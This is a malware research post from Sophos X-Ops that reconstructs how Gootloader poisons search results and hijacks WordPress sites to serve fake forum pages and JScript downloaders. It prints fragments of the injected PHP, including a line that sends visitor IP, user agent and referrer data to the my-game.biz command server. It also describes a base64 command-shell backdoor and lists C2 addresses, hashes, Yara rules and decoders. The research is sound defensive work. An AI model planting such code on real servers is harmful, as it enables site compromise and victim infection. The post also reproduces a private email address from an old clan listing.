Gootloader inside out
Credit to Author: Gabor Szappanos| Date: Thu, 16 Jan 2025 17:00:02 +0000
The Gootloader malware family uses a distinctive form of social engineering to infect computers: Its creators lure people to visit compromised, legitimate WordPress websites using hijacked Google search results, present the visitors to these sites with a simulated online message board, and link to the malware from a simulated “conversation” where a fake visitor asks a fake site admin the exact question that the victim was searching for an answer to.
Most of the infection process is driven by code that runs on the compromised WordPress server and on another server, which we have previously named “the mothership,” that orchestrates an elaborate dance to dynamically produce a page that seemingly answers the exact question you’re asking. Gootloader’s operators make behind-the-scenes, almost unnoticeable changes to the compromised WordPress sites that cause those sites to load the extra content from the mothership.
Every aspect of this process is obfuscated to such a degree that even the owners of the compromised WordPress pages often cannot identify the modifications in their own site or trigger the Gootloader code to run when they visit their own pages. At the same time, unless you control one of the affected WordPress sites, it can be very difficult (if not impossible) to get hold of this code to study it: The modified WordPress database entries and PHP scripts that comprise Gootloader reside only on the compromised server, where security researchers normally cannot access them (barring physical or shell access to the server itself).
Sophos X-Ops has previously reported on various aspects of Gootloader. For this report, we reconstructed how Gootloader’s server-side operations function, using breadcrumbs and clues left by both the threat actors and other security researchers, published in open-source tools around the internet. We have pulled this collective knowledge together here.
In this post, I’ll explain how I was able to reconstruct how the malicious SEO works; how the landing page code on the initial, compromised website validates visitors then redirects some of them to a second website; how the Gootloader operators use the second website to generate a realistic-looking message board dynamically; how the multi-stage infection process works; and how all of these parts are orchestrated by a “mothership” server, controlled by Gootloader’s operators, to decide who gets attacked and which visitors get bounced back to Google’s homepage.
Gootloader’s poisoned SEO
Gootloader has been using a virtually unchanged malicious SEO method for nearly eight years. When we have done threat hunting in the past, we’ve used our own telemetry to find the key phrases Gootloader used to deliver a malicious JScript file: Gootloader always names these first-stage files to match the search phrase that led the victim into the trap.
Finding new names for these first-stage downloaders also means discovering new phrases the Gootloader operators are using as lures. It was VirusTotal’s live hunting and retrohunting services that led us to these updated payloads, despite the fact that Gootloader’s creators use code obfuscation to an almost absurd degree. We had to create threat hunting queries such as the following Yara rule:
rule gootkit_js_stage1
{
    strings:
        $a1 = /function .{4,60}\{return .{1,20} % .{0,8}\(.{1,20}\+.{1,20}\);\}/
        $a2 = /function [\w]{1,14}\(.{1,14},.{1,50}\) \{return .{1,14}\.substr\(.{1,10},.{1,10}\);\}/
        $a3 = /function [\w]{1,14}\(.{1,50}\) \{return .{1,14}\.length;.{1,4}\}/
        $a4 = /function [\w]{1,14}\(.{0,40}\)\{.{0,40};while \([\w]{1,20} < [23][\d]{3}\) \{/
        $b1 = /;WScript\.Sleep\([\d]{4,10}\);/
        $b2 = /function [\w]{1,14}\(.{0,40}\) \{.{0,40};while\([\w]{1,20}<\([\w]{1,14}\*[\d]{1,8}\)\)\{[\w]{1,14}\+\+\}\}/
    condition:
        all of ($a*) and any of ($b*)
}
While this rule was effective at the time of our research, Gootloader’s operators have subsequently modified the JScript to render this search obsolete. In order to stay on top of these changes, we needed to analyze newer versions of the heavily obfuscated JScript code.
As part of the obfuscation, the attackers break up the code. Every elementary capability is implemented in a separate function, initially featuring randomly generated variables, then later switching to variable names selected from a dictionary.
In the example above, $a1, $a2, and $a3 match functions that performed the elementary tasks in the decryptor.
$a1 matches the function that determines the parity of a number, matching this obfuscated form:
function dance(expect,support,thin,foot,had){return expect % (magnet+magnet);}
$a2 matches the function that returns a substring from a string, matching this obfuscated form:
function supply(spoke,seed,your,build,charge,carry,sat) {return spoke.substr(seed,your);}
$a3 returns the length of a string, matching this obfuscated form:
function verb(consonant) {return consonant.length; }
$a4 matches the main decoder loop, which contains the length of the encoded part (somewhere between 2000 and 4000 bytes), in this obfuscated form:
function wave(down){against=kill;hole="";while (against < 2146) {spell=cause(down,against);hole=cool(hole,spell,against); against++; }return hole;}
The code used long delays to make dynamic analysis more difficult, extending to hours the time needed to properly run the code.
Initially, Gootloader used the WScript.Sleep function (matched by $b1) to create this delay. Over time, Gootloader’s creators replaced this with a less recognizable implementation (matched by $b2), like this function, which essentially increments a counter for a very long time:
function string2(evening6) { sky0=25; while(sky0<(evening6*4921)){ sky0++ } }
Even though the code is highly obfuscated, knowing the structure of the code enabled us to create the above seemingly loose Yara rule – which caught thousands of first stage downloader scripts with zero false positives.
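For readers who want to sanity-check the structural patterns, the following is a minimal Python sketch (not part of our original tooling) that translates the $a1 to $a4 strings into Python regular expressions and runs them against the obfuscated sample functions quoted above. It assumes the regex metacharacters in the rule are backslash-escaped; the names PATTERNS, SAMPLES, and matched_a_strings are illustrative only.

```python
import re

# Python `re` translations of the $a1-$a4 strings. The backslash escapes are an
# assumption about how the original rule escapes its literal metacharacters.
PATTERNS = {
    "a1": r"function .{4,60}\{return .{1,20} % .{0,8}\(.{1,20}\+.{1,20}\);\}",
    "a2": r"function [\w]{1,14}\(.{1,14},.{1,50}\) \{return .{1,14}\.substr\(.{1,10},.{1,10}\);\}",
    "a3": r"function [\w]{1,14}\(.{1,50}\) \{return .{1,14}\.length;.{1,4}\}",
    "a4": r"function [\w]{1,14}\(.{0,40}\)\{.{0,40};while \([\w]{1,20} < [23][\d]{3}\) \{",
}

# The obfuscated sample functions quoted in the text, one per pattern.
SAMPLES = {
    "a1": "function dance(expect,support,thin,foot,had){return expect % (magnet+magnet);}",
    "a2": "function supply(spoke,seed,your,build,charge,carry,sat) {return spoke.substr(seed,your);}",
    "a3": "function verb(consonant) {return consonant.length; }",
    "a4": 'function wave(down){against=kill;hole="";while (against < 2146) '
          "{spell=cause(down,against);hole=cool(hole,spell,against); against++; }return hole;}",
}


def matched_a_strings(script):
    """Return the sorted names of the $a patterns found anywhere in the script."""
    return sorted(name for name, pattern in PATTERNS.items() if re.search(pattern, script))


if __name__ == "__main__":
    combined = "\n".join(SAMPLES.values())
    print(matched_a_strings(combined))
```

Because each pattern only pins down the shape of a function (a modulo, a substr call, a length lookup, a bounded while loop), renaming the variables does not break the match, which is why the rule survived the switch from random names to dictionary words.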
Once we had the original file names, we had the search terms. With those, we could find the landing pages: The Gootloader operators were successful in manipulating the search results and the compromised landing sites, such that they end up near the top of the search results (even in the first result, as in the example below):
How did the malicious pages end up at the top of the search results?
We were able to learn how the malicious SEO was so effective by inspecting the HTML source of the search landing pages.
There is a hidden element, the name of which is actually a server ID, used at many places in the code (a47ec48 in the following example). It starts with the letter ‘a’ followed by 6 hexadecimal characters:
<div id="a47ec48 "> ... <div><script type="text/javascript"> document.getElementById("a47ec48 ").style.display="none"; </script>
That hidden element had links (selected with green) and the matching targeted search terms (selected with brown):
This hidden element will not be visible to human webpage visitors. But search engine crawlers see and process it, which tricks the search engines into treating the website as if it provides relevant content on the poisoned search term, thus ranking the site high in the search results.
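A site owner or researcher could look for this pattern in saved page source. The sketch below is a minimal Python example, assuming the server ID always follows the format described above ('a' plus six hexadecimal characters) and that the element is hidden with the same getElementById call shown in the sample; the function name find_hidden_server_ids is hypothetical.

```python
import re

# Server ID format described in the text: 'a' followed by six hex characters.
# Optional whitespace is tolerated inside the quotes, as in the sample above.
HIDE_CALL = re.compile(
    r'document\.getElementById\(\s*"(a[0-9a-f]{6})\s*"\s*\)\.style\.display\s*=\s*"none"'
)


def find_hidden_server_ids(html):
    """Return the unique server IDs whose elements are hidden by inline script."""
    return sorted(set(HIDE_CALL.findall(html)))


SAMPLE_HTML = (
    '<div id="a47ec48 "> ... <div><script type="text/javascript"> '
    'document.getElementById("a47ec48 ").style.display="none"; </script>'
)

if __name__ == "__main__":
    print(find_hidden_server_ids(SAMPLE_HTML))
```

A hit is only a lead, not proof of compromise: legitimate pages also hide elements with inline script, so the ID format is the part that narrows the search.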
Compromised landing page code
When security vendor Sucuri wrote up a blog post about an earlier generation of Gootloader, it included this screenshot:
The report (and screenshot) revealed three promising strings:
- The request: $_GET['a55d837'
- A malicious web domain name: ‘my-game[.]biz’
- A SQL query (shown on a different screenshot in Sucuri’s blog): ‘SELECT * FROM backupdb_’
Searching Google for the code fragment $_GET['a55d837' led us to an online decoder page, where the result (now deleted) of another researcher’s query revealed the encoded version of the PHP code used in the malicious web page:
function qwc1() {
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb->get_var("\x53\105\x4c\105\x43\124\x20\105\x58\111\x53\124\x53\40\x28\123\x45\114\x45\103\x54\40\x2a\40\x46\122\x4f\115\x20\142\x61\143\x6b\165\x70\144\x62\137".$table_prefix."\x6c\163\x74\141\x74\40\x57\110\x45\122\x45\40\x77\160\x20\75\x20\47".$qwc2[0].'|'.$qwc2[1].'|'.$qwc2[2]."\x27\51\x3b") == 1) {
and the decoded version of that same script:
function qwc1() {
    global $wpdb, $table_prefix, $qwc1;
    $qwc2 = explode('.', $_SERVER["REMOTE_ADDR"]);
    if (sizeof($qwc2) == 4) {
        if ($wpdb->get_var("SELECT EXISTS (SELECT * FROM backupdb_".$table_prefix."lstat WHERE wp = '".$qwc2[0].'|'.$qwc2[1].'|'.$qwc2[2]."');") == 1) {
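The string obfuscation in the encoded version is simple to reverse: PHP double-quoted strings accept both \xHH (hexadecimal) and \NNN (octal) escapes, and the encoded listing alternates between the two. The following Python sketch decodes such strings. It assumes the escapes carry their backslashes, as they would in the PHP source, and the helper name decode_php_escapes is illustrative.

```python
import re

# PHP double-quoted strings allow \xHH (one or two hex digits) and \NNN
# (one to three octal digits). The obfuscated strings alternate between them.
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def decode_php_escapes(text):
    """Replace hex and octal escape sequences with the characters they encode."""
    def _replace(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        # Octal escapes are masked to one byte (values above \377 wrap around).
        return chr(int(match.group(2), 8) & 0xFF)
    return _ESCAPE.sub(_replace, text)


# Two of the obfuscated strings from the encoded listing, with backslashes.
SERVER_KEY = r"\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"
WHERE_CLAUSE = r"\x6c\163\x74\141\x74\40\x57\110\x45\122\x45\40\x77\160\x20\75\x20\47"

if __name__ == "__main__":
    print(decode_php_escapes(SERVER_KEY))
    print(decode_php_escapes(WHERE_CLAUSE))
```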
While it isn’t clear how the code ended up on that website, the Internet never forgets: Search engines found and indexed this analysis. This gave us the first insight into what the injected code of the compromised landing pages would look like.
(Both the analysis linked above, and another page I subsequently found on malwaredecoder.com, were later removed by their respective site owners. Search results that reveal ephemeral analysis pages like these are only available for a short period of time. If you plan to cite source materials from sites such as these, keep an offline copy of the page, because they may not be there when you return.)
At this point we didn’t know exactly how the sites are compromised, but we knew from the report that malicious PHP code is somehow inserted into the WordPress installation.
A VirusTotal search for content:"SELECT * FROM backupdb_" returns a couple of files from a compromised server that contain an error message:
<div id="error"><p class="wpdberror"><strong>WordPress database error:</strong> [Table 'interfree.backupdb_wp_lstat' doesn't exist]<br /><code>SELECT EXISTS (SELECT * FROM backupdb_wp_lstat WHERE wp = '117|50|2');</code></p></div><!DOCTYPE html>
The criminals are likely using the database table backupdb_wp_lstat, which must have been removed from the server during a cleanup. We hunted for this content on VirusTotal (search term: content:"backupdb_wp_lstat"), hoping we would stumble upon a database dump. It is always a good idea to set up these rules and do additional retrohunts, which can reveal other valuable files or data.
We were lucky, and found an archive file containing a SQL dump of the WordPress database from a compromised server on a public malware repository.
The dumped database contains a table called backupdb_wp_lstat. Later analysis determined that this table contains the IP address blocklist the malicious website uses to prevent repeat visits.
The obfuscated PHP code was also viewable in the database dump:
…as was the injected SEO poisoning content, with the j$k..j$k marker:
Researchers who want to hunt for this identifiable string in the Descriptions property of the malicious landing pages can use the regex /j\$k([0-9]{1,10})j\$k/
This marker serves as placeholder for the spot where Gootloader’s link to the page renderer script is inserted. When the Gootloader page is served up, it excludes the marker from the page source.
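As an illustration of how the marker could be hunted for in a database dump or exported post content, here is a minimal Python sketch. The dollar signs must be escaped so they match literally rather than acting as end-of-line anchors. The sample text and the number inside it are invented for the example, and find_markers is a hypothetical helper name.

```python
import re

# The j$k<digits>j$k marker. Each '$' is escaped to match a literal dollar sign.
MARKER = re.compile(r"j\$k([0-9]{1,10})j\$k")


def find_markers(text):
    """Return the numeric payload of every j$k...j$k marker, as strings."""
    return MARKER.findall(text)


# Invented sample content; the value 12345 is a placeholder, not a real marker.
SAMPLE_TEXT = "An otherwise ordinary post description j$k12345j$k with trailing text."

if __name__ == "__main__":
    print(find_markers(SAMPLE_TEXT))
```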
However, the code extracted from the SQL database dump was not exactly the same as what was shown in the Sucuri blog. We continued searching for more examples by pivoting on the C2 server my-game[.]biz, and found a handful of PHP files referring to that server:
The submission name commented_functions.php looked promising. Indeed, it turned out to be likely the work of a researcher, analyzing the PHP source code from the compromised WordPress installation. It was kindly documented in detail, saving us some analysis time (which also helped because we didn’t have all the components).
We were able to use the base64 string referenced in the “html” comment above to search VirusTotal, which led us to a (relatively) recently uploaded SQL dump.
The dump file contained the previously referenced base64 blob…
…which, when decoded, output the same code that was originally published by Sucuri:
With this in hand, we had greater confidence in the provenance of this malicious code. We also identified the table where Gootloader stores it in a compromised WordPress database. Having located the dump of the WordPress database and the PHP code on the online decoder site, we have a complete copy of the malicious content hosted on the compromised landing sites.
What’s in the landing page code?
This code contains a simple PHP command shell, which the Gootloader attackers can use to maintain access to compromised pages.
The variable $pposte holds the name of the parameter that gets executed. If the compromised website receives an HTTPS POST with that string in it, the code on the page will decode and execute any base64 encoded commands it receives, turning into a bare-bones command shell the attackers can use to maintain control over the server:
At other points inside the code, the script defines filters for WordPress events, which trigger the execution of functions based on predefined conditions.
For example, the following function executes once the attackers have set up the compromised WordPress environment: the invoked code (referenced as “qvc5”) initializes the backupdb_wp_lstat database table.
add_action("wp", "qvc5");
This snippet from the qvc5() function initializes the backend databases used by Gootloader:
if ($table_prefix <> "backupdb_".$qvc4) {
    $table_prefix = "backupdb_".$qvc4;
    wp_cache_flush();
    $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
    $qvc5->set_prefix($table_prefix);
On preparing the requested web page, the malicious event handler hooks build the request to the “mothership” (a name I’ve given to the website the Gootloader operators use to centrally manage their fleet of compromised blogs). The communication sends the mothership the following parameters of the initial request, all in base64 encoded form:
- a: Unique server ID
- b: IP address of the unsuspecting visitor
- c: user agent
- d: referrer string
if (isset($_GET[$qwc4])) { $request = @wp_remote_retrieve_body(@wp_remote_get("http://my-game.biz/index.php?a=".base64_encode($_GET[$qwc4]). '&b='.base64_encode($_SERVER["REMOTE_ADDR"]). '&c='.base64_encode($_SERVER["HTTP_USER_AGENT"]). '&d='.base64_encode(wp_get_referer()), array("timeout" => 120)))
One of Gootloader’s most problematic behaviors is that it only allows the potential victim to visit the site once in a 24-hour period. It does this by adding the originating IP address of this communication (the address of the victim PC, variable ‘b’ above) to a block list. The server also geofences IP address ranges, and only allows requests to originate from specific countries of interest to the Gootloader threat actor. The referrer string (variable ‘d’ above) contains the original search terms.
This results in a query that looks like this:
http://my-game.biz/index.php?a=YWFkZTVlZQ&b=ODUuMjE0LjEzMi4xMTc&c=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg4LjAuNDMyNC4xNTAgU2FmYXJpLzUzNy4zNg&d=Z29vZ2xlLz9xPWNpc2NvX3dwYV9hZ3JlZW1lbnQ
(In this example, the “&d=” referrer string is the base64-encoded value of “google/?q=cisco_wpa_agreement”)
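Anyone who captures one of these requests in proxy or firewall logs can recover the original values with a few lines of code. The following Python sketch decodes the example query shown above; it restores the base64 padding that is missing from the example values before decoding. The function names are illustrative, and nothing here contacts the server.

```python
import base64
from urllib.parse import urlsplit


def b64decode_unpadded(value):
    """Decode base64 text whose trailing '=' padding has been stripped."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def decode_mothership_query(url):
    """Return a dict of decoded query parameters from a mothership request URL."""
    items = urlsplit(url).query.split("&")
    pairs = (item.split("=", 1) for item in items if "=" in item)
    return {key: b64decode_unpadded(value) for key, value in pairs}


# The example request from the text, split across lines for readability.
EXAMPLE_URL = (
    "http://my-game.biz/index.php"
    "?a=YWFkZTVlZQ"
    "&b=ODUuMjE0LjEzMi4xMTc"
    "&c=TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQv"
    "NTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzg4LjAuNDMyNC4xNTAgU2FmYXJpLzUzNy4zNg"
    "&d=Z29vZ2xlLz9xPWNpc2NvX3dwYV9hZ3JlZW1lbnQ"
)

if __name__ == "__main__":
    for name, value in decode_mothership_query(EXAMPLE_URL).items():
        print(name, "=", value)
```

The query string is split by hand rather than with a form parser because unescaped base64 can contain '+' characters, which form decoding would turn into spaces.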
Later, we will see that the server’s response will be the fake forum page renderer code.
The mothership sends the fake forum page
The mothership response contains two parts: one contains the HTML header elements, and the other contains the page body content. The two are delimited in the code by a <sleep> tag.
The header part contains multiple elements, separated by pipe (“|”) characters. Using what it gets from the mothership, the landing page code will gather the HTML content:
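The two-level split described above (a <sleep> tag between header and body, then pipes inside the header) can be sketched in Python as follows. This is only an illustration of the parsing shape: the sample response and its field contents are invented, and the real header fields and their order are not reproduced here.

```python
def split_mothership_response(response):
    """Split a response into (header_fields, body) around the <sleep> delimiter."""
    header, delimiter, body = response.partition("<sleep>")
    if not delimiter:
        raise ValueError("response does not contain a <sleep> delimiter")
    # Header elements are separated by pipe characters.
    return header.split("|"), body


# Invented sample; the actual header fields are an assumption for illustration.
SAMPLE_RESPONSE = "field-one|field-two|field-three<sleep><div>forum body</div>"

if __name__ == "__main__":
    fields, body = split_mothership_response(SAMPLE_RESPONSE)
    print(fields)
    print(body)
```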
The script adds the entire /24 IP address range where the request originated to a 24-hour block list. Neither the originating computer, nor any others with the same initial three sets of numbers in its IP address, can get the page again for at least a day. (This matches the block list table already seen in the SQL database dump.)
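The block list key can be reproduced from the decoded PHP shown earlier, which splits REMOTE_ADDR on dots, requires exactly four parts, and joins the first three with pipe characters (for example, '117|50|2' in the database error message). A minimal Python equivalent, with the hypothetical name blocklist_key, might look like this:

```python
def blocklist_key(remote_addr):
    """Return the 'x|y|z' key for an IPv4 address, or None if it has no four parts."""
    octets = remote_addr.split(".")
    if len(octets) != 4:
        # Mirrors the sizeof(...) == 4 check: other address forms are skipped.
        return None
    return "|".join(octets[:3])


if __name__ == "__main__":
    # Two hosts in the same /24 share one key, so blocking one blocks both.
    print(blocklist_key("117.50.2.9"))
    print(blocklist_key("117.50.2.200"))
```

This is why repeat testing from the same office or home network fails: every address that shares the first three octets maps to the same key.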
How Gootloader renders the fake forum page
If the request comes from an IP address that isn’t on the block list, the malicious code in the compromised WordPress database takes action and delivers the bogus message board content (typically titled simply “Questions And Answers”) to the visitor’s browser.
The only visible malicious content in the source code of a compromised landing page is a simple inserted JavaScript tag. For example:
https://powerstick.com/main/?ad94610=1174868
Here, again, the unique key for the infected server is used as a parameter assigned to a numeric value (1174868 in the above example):
This <script> tag will invoke the landing page renderer function from the code stored in the WordPress database.
If the HTTPS GET request contains a query string that includes the infection ID, the handler code sends a request to the mothership and renders the response.
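To pull the infection ID and its numeric value out of a script URL like the one above, a researcher could use something like the following Python sketch. It assumes the ID always follows the 'a' plus six hexadecimal characters format described earlier and that the value is numeric; extract_infection_params is a hypothetical helper name.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Infection ID format described in the text: 'a' followed by six hex characters.
SERVER_ID = re.compile(r"a[0-9a-f]{6}")


def extract_infection_params(url):
    """Return (server_id, numeric_value) from the query string, or None."""
    for key, value in parse_qsl(urlsplit(url).query):
        if SERVER_ID.fullmatch(key) and value.isdigit():
            return key, int(value)
    return None


if __name__ == "__main__":
    print(extract_infection_params("https://powerstick.com/main/?ad94610=1174868"))
```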
We are able to get the code returned by the mothership by grabbing the fake landing page HTML source, and using a web debugger that records the on-the-fly changes.
First it deletes the original content of the HTML page:
…and replaces it with the fake forum text…
…which also contains the download link for the first stage JScript payload:
The result will look like a conversation in the blog comments in which someone “asks” a question identical to the search query passed from the Google referrer text, a “response” appears from a user account named Admin with the search term hotlinked to the first stage JScript downloader, and a followup “response” from the same “user” who “asked” the initial question, thanking the admin who “answered.”
The entire conversation is a fiction. It follows this pattern in every Gootloader incident.
The first-stage downloader site
The fake forum page connects to the first stage download server, where a PHP script serves the first stage JScript downloader script.
(We received a copy of this script from another researcher in the security community, who wishes to remain anonymous, under TLP:Red restrictions. While we couldn’t use the script we received in this blog post, we could use characteristics of the script to hunt for similar samples.)
On the server side, this file is embedded as a large Base64-encoded data blob, with text that begins:
<?php $a=base64_decode('ZnVuY3Rpb24...
With this information, we could search for similar scripts, using this Yara rule:
rule gootkit_stage1_dl{ strings: $a = "<?php $a=base64_decode('ZnVuY3Rpb24" condition: all of them }
This gave us a handful of other variants of the script, with the main difference being the download URL:
- c20a040acb10e820cfaaa086bdc807ffed6241bc5d0fc9e11a02a5d355125df0
- 5b5652c6ea0c0c88105baf6a700324bdf2cd8f47772a3215f721dccdce9141c4
- 744951acfd9456fc59086b81d494c7092cda9968073d32ded64ac09291644bd9
- 361fab9858a9bc4a120e67baa01fd5bc4918d20b32bb918a8faacb143f418ac8
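The Yara rule above works because of what the base64 prefix decodes to. A short Python sketch (an illustration, not part of the rule) shows that ZnVuY3Rpb24 is the encoding of the word "function", so any embedded script that begins with a function declaration followed by a space produces the same leading characters:

```python
import base64

PREFIX = "ZnVuY3Rpb24"


def decode_prefix(prefix):
    """Decode a base64 fragment after restoring its '=' padding."""
    padded = prefix + "=" * (-len(prefix) % 4)
    return base64.b64decode(padded)


def encoded_start(script_bytes):
    """Return the first 11 base64 characters of the encoded script."""
    return base64.b64encode(script_bytes).decode("ascii")[: len(PREFIX)]


if __name__ == "__main__":
    print(decode_prefix(PREFIX))
    print(encoded_start(b"function wave(down){"))
```

The function names that follow the keyword change from sample to sample, but the first eleven base64 characters do not, which makes them a stable anchor for hunting.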
We observed two mothership addresses, 5.8.18[.]7 and my-game[.]biz in the samples we studied. At the time we initially researched this, the my-game domain resolved to that IP address (it now resolves elsewhere). Oddly, the compromised landing page code links to the domain, and the first stage JScript downloader links to the IP address.
The first stage download script (down.php or join.php or about.php or index.php) simply relays the incoming request to the mothership:
The request sent to the mothership will return the first-stage downloader JScript packaged in a Zip archive. Because it passes the original referrer string all the way to the mothership, it will receive the original search terms, and can return a payload with a file name matching these search terms, which is what we’ve observed happens.
How Gootloader compromises WordPress servers
Near the end of our initial research, we found an important piece of information about the likely source of the initial compromise of the hosting WordPress servers. As we gather more information, it’s worth revisiting prior research, which may reveal clues that we didn’t know were related at the time.
The writeup describes an attack where attackers placed a modified copy of the Hello Dolly plugin in the WordPress uploads directory (e.g. wp-content/uploads/), which they then used to initiate the installation of the malicious WordPress content.
HelloDolly.php has been a stock plugin, included with the WordPress self-hosted download, for many years. In any case, modifying this code in a relatively benign plugin, and leaving it in place on the compromised server, allows Gootloader to operate in plain sight while minimizing the filesystem changes that might reveal a compromise to an alert webmaster.
There are several ways in which a threat actor might be able to place a file into a WordPress site: The credentials for the web server might have been phished or stolen; a WordPress component may have had a vulnerability that permitted remote users to perform SQL injection or command execution exploits on the host server; the administrative WordPress password might have been stolen.
In this case, the writeup contains a screenshot:
We searched VirusTotal for more of these files:
content:"dolly_css"
While we found several clean, original versions of the HelloDolly.php file…
- 2c5717200729f76b857a8a32608b72fd3c15772dfcc607bebfc3b36f8ab2a499
- 2c3d2a55349efe8b636350b58181d930a73e0d0ede59dcaadc47d9a56dd15127
…we found many more where the backdoor code had been injected…
- 03a46ad7873ddb6663377282640d45e38697e0fdc1512692bcaee3cbba1aa016
- 1fcc418bdd7d2d40e7f70b9d636735ab760e1044bb76f8c2232bd189e2fd8be7
- 258cb1d60a000e8e0bb6dc751b3dc14152628d9dd96454a3137d124a132a4e69
- 5d50a7cf15561f35ed54a2e442c3dfdac1d660dc18375f7e4105f50eec443f27
- 7bcffa722687055359c600e7a9abf5d57c9758dccf65b288ba2e6f174b43ac57
- af50c735173326b2af2e2d2b4717590e813c67a65ba664104880dc5d6a58a029
…and we also found a few Zips that contained complete copies of compromised WordPress installations:
- 89672c08916dd38d9d4b7f5bbf7f39f919adcaebc7f8bb1ed053cb701005499a
Here, the malicious HelloDolly PHP script is installed as a WordPress plugin under the path:
wp-content\plugins\Hello_Dolly\HelloDolly.php
The malicious PHP files show the additional code alongside the original Hello Dolly lyrics. The inserted code checks the POST request for specific parameters and, if it finds them, executes the submitted installation code.
We found other variations where the $dolly variables are renamed $wp.
The research blog post summarizes the process like this:
We found these components in the SQL database dumps, giving us enough confidence to establish that this was (at least) one way the attackers compromised these legitimate WordPress sites to turn them into distribution servers.
Docking with the mothership
The mothership server plays a central role orchestrating the early stages of the infection process: It provides the fake forum content that the compromised sites display in the target’s browser, as well as the first stage payload.
Unfortunately, because this has all been maintained on a server that is directly controlled by the threat actors, whatever source code it may contain is not available to researchers.
Disturbingly, since Gootloader first appeared on the scene in 2018, it has used the same domain, and for most of that time the domain has pointed to the same handful of IP addresses.
5.8.18[.]7
The my-game[.]biz domain resolved to this IP address for several years. Many of the malicious scripts point directly at URLs hosted on this IP address to deliver components of the infection.
Known URLs:
http://5.8.18[.]7/filezzz.php
The initial components of the infection are files known as Gootkit. They are usually just PHP scripts that contain a base64-encoded string and a script to decode the data and output it to a variable, such as this file (variably referred to as join.php or down.php).
We were also able to identify several Gootkit files that refer to, or link to, this IP address, including this script, and this script. Both of these files contain error messages that refer to something not being able to completely download a component.
Interestingly, the server-side downloader script was named file_tmp_41.php, which is unlike the downloader scripts seen normally. That may indicate this script was an artifact of testing.
If we pivot off of this information and (for example) search VirusTotal for content:"<?php $a=base64_decode('ZnVuY3Rpb24", the result yields additional files, both of which contain a URL that we’ve previously discussed:
http[:]//5.8.18.7/filesst.php?a=$i&b=$u&c=$r&d=$h&e=$g
5.8.18[.]159
This was another address that my-game[.]biz has resolved to in the past. We were able to find another first-stage Gootkit component that links directly to this IP address.
91.215.85[.]52
Yet another IP that has been used to host my-game[.]biz and continues to do so. We found still another first-stage Gootkit script that links to this IP address.
my-game[.]biz
The site is blank now, but the Internet Archive reveals an interesting origin story to this domain: In 2014, it was used to host a Russian online gambling site. Since 2018, the page has hosted no other content but has been linked to the Gootkit/Gootloader malware.
The only other reference we could find to the domain was a Counter-Strike clan directory dating back more than 15 years.
The directory lists this website as the home page for a group of “semi professional” players based in Germany who played under the handle #mY-GaMe.
Name: #mY-GaMe
Clan tag (abbreviation): #mY-GaMe`
Country (clan headquarters): Germany-wide
City (clan headquarters): Germany-wide
Leader: pr0nb1tch
ICQ#: 256558686
Homepage: http://www.my-game.biz
Number of players: 10
Game modes: Leaguez
Clan profile: Semi-professional clan
Clan is looking for new players: Yes
Leader: kevin.goe@online.de
Open-source intelligence reveals a lot
With a malware infection method seemingly designed to make it as difficult as possible for researchers to dig in and learn how it works, Gootloader remains one of the most pernicious and difficult-to-study threats on the web.
However, despite most of its code existing and running inside of other people’s WordPress servers, the proliferation of online analysis tools provides a rich pool of opportunity to learn how the malware works, and how its loader delivers payloads. Thanks to the resources uploaded by a variety of different analysts and researchers, we’ve been able to build a nearly complete picture of how the malware operates.
The PHP scripts, embedded JavaScript components, and downloadable JScript payloads of this infection are now well understood, and yet the malware continues to have an impact, more than six years after it was first discovered. Fortunately, due to the relatively sluggish pace of the malware’s development and its relatively stable hosting of the “mothership” server, static and dynamic detections remain effective.
And a final note about collaborative research projects. It pays to develop and maintain relationships with the malware analysis and security research community. For this project, we received help from several researchers, some of whom did not want to be acknowledged. Our advice: If you do this kind of work, don’t hesitate to share your findings; you will find that the effort you invest in collaboration with colleagues across the industry will eventually pay off when you need information. We are grateful for the support and help we received from several individuals.
Acknowledgments
Sophos X-Ops gratefully acknowledges the contribution of Marv Ahlstrom, an SEO expert who advised us about various aspects of Gootloader/Gootkit’s malicious SEO. The author also wishes to thank the pseudonymous researchers who use the handles @sS55752750, @SquiblydooBlog, and @GootLoaderSites for their assistance. We also recognize and are grateful for research previously published by Sucuri and Rich Infante. X-Ops researcher Andrew Brandt contributed to this analysis.
Indicators of compromise
Hashes and other IOCs referenced in this story are listed on the SophosLabs Github.